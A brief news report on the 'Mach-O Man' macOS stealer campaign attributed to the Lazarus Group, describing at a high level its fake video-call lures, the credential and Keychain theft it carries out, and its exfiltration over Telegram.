A new macOS malware campaign, dubbed "Mach-O Man," has been linked to the Lazarus Group, the North Korea-backed cybercriminal organization responsible for major cryptocurrency thefts.
Security researchers report the malware is distributed through social engineering schemes involving fake Zoom or Google Meet calls. Victims are tricked into executing commands that download the malware, allowing attackers to gain access to credentials and corporate systems.
The "Mach-O Man" kit's final stage is a stealer designed to extract sensitive data, including browser credentials, cookies, and macOS Keychain entries. This information is then exfiltrated via Telegram.
The campaign's expansion beyond crypto-native companies highlights Lazarus Group's evolving targeting strategies. The group has been implicated in some of the largest crypto hacks to date, including a $1.4 billion exchange hack in 2025.